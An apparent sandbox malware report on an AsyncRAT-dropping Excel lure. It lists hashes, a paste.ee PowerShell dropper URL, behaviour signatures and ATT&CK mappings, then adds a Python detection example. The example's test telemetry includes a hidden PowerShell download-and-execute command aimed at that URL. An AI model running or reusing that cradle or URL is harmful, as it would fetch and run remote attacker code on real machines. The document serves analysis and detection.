General

  • Target

    Wire-Telex Copy .xls

  • Size

    136KB

  • Sample

    201005-bytl8tqkt2

  • MD5

    3b41c3d33589de59952989dafd18f0a7

  • SHA1

    c37dc779c64fdad0a1c7e79de2ca7d26c754e0c2

  • SHA256

    490cb5121a4ce0761111fe088bccdc6de5ce78ff082a356a4a39ee169b428491

  • SHA512

    893b487dac90f1856d7a47fd639a45ae95e4cf4ba244b4f4d68fe3f93da1e6252ad79367ce08da0f93905a7aa4f725c5b915799f54a840b16dfdb6d2305c1812

Malware Config

Extracted

  • Language: ps1
  • Source: URLs
  • ps1.dropper: http://paste.ee/r/v5e8E

Targets

    • Target

      Wire-Telex Copy .xls


    Score
    10/10
    • AsyncRat

      AsyncRAT is designed to remotely monitor and control other computers.

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blacklisted process makes network request

    • Executes dropped EXE

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.
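The two process-level signatures above (an Office parent spawning a script host, and that child then making a network request) can be reproduced as simple detection logic over endpoint telemetry. The block below is an added example, not Triage's own detector and not code from the sample: it runs over constructed, Sysmon-style process-create and network-connect events modelled on what this report describes (EXCEL.EXE opening the .xls, then powershell.exe fetching the ps1.dropper URL from paste.ee). The event field names, the process lists, the PIDs and the command lines are this example's assumptions.

```python
import re

# Process images that should not normally be spawned by an Office application.
# These lists are this example's choices, not Triage's blacklist.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
URL_RE = re.compile(r"https?://[^\s'\"()]+")

# Constructed telemetry modelled on Sysmon process-create (Event ID 1) and
# network-connect (Event ID 3) records. Field names, PIDs and command lines are
# assumptions for this example, not captured data from the sandbox run.
EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1,
     "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"type": "process", "pid": 200, "ppid": 100,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmd": '"EXCEL.EXE" "C:\\Users\\victim\\Downloads\\Wire-Telex Copy .xls"'},
    {"type": "process", "pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -ep bypass -c IEX (New-Object Net.WebClient)"
            ".DownloadString('http://paste.ee/r/v5e8E')"},
    {"type": "network", "pid": 300, "dest_host": "paste.ee", "dest_port": 80},
    # Benign noise: a normal child of explorer and Excel's own update traffic.
    {"type": "process", "pid": 400, "ppid": 100,
     "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe"},
    {"type": "network", "pid": 200, "dest_host": "officecdn.microsoft.com", "dest_port": 443},
]


def basename(image):
    """Lower-cased file name of a Windows image path."""
    return image.rsplit("\\", 1)[-1].lower()


def build_processes(events):
    """Index process-create events by PID so parents can be looked up."""
    return {e["pid"]: e for e in events if e["type"] == "process"}


def unexpected_children(events):
    """'Process spawned unexpected child process': Office parent -> script host.
    Returns (parent image, child image, child pid) for each hit."""
    procs = build_processes(events)
    hits = []
    for p in procs.values():
        parent = procs.get(p["ppid"])
        if parent and basename(parent["image"]) in OFFICE_APPS \
                and basename(p["image"]) in SCRIPT_HOSTS:
            hits.append((basename(parent["image"]), basename(p["image"]), p["pid"]))
    return hits


def blacklisted_network(events):
    """'Blacklisted process makes network request': a script host opening a
    connection. Returns (image, pid, host, port) for each hit."""
    procs = build_processes(events)
    hits = []
    for e in events:
        if e["type"] != "network":
            continue
        p = procs.get(e["pid"])
        if p and basename(p["image"]) in SCRIPT_HOSTS:
            hits.append((basename(p["image"]), e["pid"], e["dest_host"], e["dest_port"]))
    return hits


def dropper_urls(events):
    """Pull candidate download-cradle URLs out of process command lines; this is
    how the report's ps1.dropper value would surface from the telemetry."""
    return sorted({u for e in events if e["type"] == "process"
                   for u in URL_RE.findall(e["cmd"])})


if __name__ == "__main__":
    print("unexpected children:", unexpected_children(EVENTS))
    print("script-host network:", blacklisted_network(EVENTS))
    print("dropper URLs:", dropper_urls(EVENTS))
```

The two detections are kept separate on purpose: the parent/child rule fires at process creation, before any network activity, while the network rule gives a second, independent alert if the first is missed (for instance when the process-create event is lost). Excel's own outbound connection is not flagged because only script hosts are in the blacklist, which keeps the noise down on hosts where Office legitimately talks to Microsoft CDNs.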

MITRE ATT&CK Matrix (ATT&CK v6)

  Tactic / Technique (ID) / count

  Defense Evasion
    • Install Root Certificate (T1130): 1
    • Modify Registry (T1112): 1

  Credential Access
    • Credentials in Files (T1081): 1

  Discovery
    • Query Registry (T1012): 2
    • System Information Discovery (T1082): 2

  Collection
    • Data from Local System (T1005): 1

  Note: the IDs above are ATT&CK v6. In current ATT&CK, T1130 has been folded into Subvert Trust Controls: Install Root Certificate (T1553.004) and T1081 into Unsecured Credentials: Credentials In Files (T1552.001).
